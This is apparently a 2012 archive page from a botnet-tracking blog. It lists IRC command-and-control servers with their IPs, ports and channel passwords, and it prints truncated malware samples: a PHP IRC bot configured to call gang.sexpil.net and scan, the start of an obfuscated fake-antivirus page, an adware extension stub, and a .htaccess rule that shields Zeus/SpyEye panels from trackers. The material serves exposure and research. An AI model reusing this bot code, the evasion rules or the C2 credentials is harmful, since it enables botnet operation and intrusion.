Month: May 2012

4thdemo.com(Insomnia bot hosted in United States Clarks Summit Volumedrive)

Another post from our anonymous friend Resolved : [4thdemo.com] To [199.19.105.123] server port password channel 4thdemo.com:3344 785chelsea #Insomnia 4thdemo.com:5443 alexandre69 #Channel Password 4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie 4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric All are seperate irc servers, but hosted on the same server. Some HF hecker selling to skids. Oh, its DeMoNi *

insomnia.incorporatedhosting.info(Insomnia bot hosted in United Kingdom Ovh Systems)

This botnet is found by our anonymous friend here all credits go to him for this Server Port insomnia.incorporatedhosting.info:5656 Channel: #insomnia k6geyzs Botnet owner: Digital from HF and friends Here Lilyjade extension named Ad Killer Pro (found from our anonymous friend) //New Lilyjade extension //Named: Ad Killer Pro //CrosRider #:4995 //Panel: http://nemsmedia.cloudapp.net //Extension appAPI.ready(function($) {

Anti ZS spyeyes Tracker .htaccess

Criminals now are forced to find diferent methods to protect malwares like zeus or spyeye from being traced and exposed This is one of them: ############################ #Anti ZS spyeyes Tracker .htaccess # #84.74.14?.* # ############################ RewriteEngine on RewriteCond %{HTTP_REFERER} ^http://.*google.com [NC] RewriteRule .* – [F] ########################################### #Spider Blocker/Crawler/Bot’s # ########################################### Order Deny,Allow Deny from 82.165.47.*

Remember h1t3m?lol

Some of u heckers prob remember h1t3m the australian guy who got caught and send to prison for infecting like 3k people i found some nice logs and as u can see it was not so hard to find him he even tell his real name to buyers who wanted to buy his spack have

b4nb1n0.dyndns.tv(ngrBot hosted in Spain Ovh Systems)

Domains used for controlling the botnet b4nb1n0.dyndns.tv active d11.dyndns.tv 0csf15.dyndns.tv Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27] server: b4nb1n0.dyndns.tv PASS b4nb1 Local users: Current Local Users: 82 Max: 92 Global users: Current Global Users: 82 Max: 92 NICK n{USA|XPa}hrczwsa USER hrczwsa 0 0 :hrczwsa JOIN #hola juli26 Now talking in #hola Modes On: [ #hola ] [

Fake Antivirus Example

html file is encrypted u have to decrypt the encrypted(base64) part if u want to have more from this malware open the html file in sandboxie to see what it does virtest.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <title>Wait a minute! This is important – we check your devices.</title> <meta http-equiv="Content-Type" content="text/html;

91.121.171.64(irc botnet hosted in France Ovh Systems)

ip:port 91.121.171.64:9040 nick xUVEuwU user cjfsiemx channel #j channel #c channel #m Now talking in #j Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ] Topic By: [ y ] Now talking in #c Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ] Topic By: [ y ] UPDATE: 91.121.171.64:4676 Now talking in #balengor Topic On: [

gang.sexpil.net(Linux bots hosted in United States Truckee Softcom America Inc)

Another bot from Tijn Resolved : [gang.sexpil.net] To [216.224.184.101] <?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ { var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net", "eBwz"=>"23232", "ZnQWe"=>"scary", "KqkktZ"=>"13", "KtWqnhZ"=>"#wWw#", "tZQ"=>"scan", "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88", "eWNTTTEhbQ"=>".", "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd"); var $users = array(); /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */ function yySydpvYj($host) { $this->users[$host] = true; } function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msgrn"); } function aGGAJSAgavgjADGa() { $chars = ‘abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789’; $size = strlen($chars);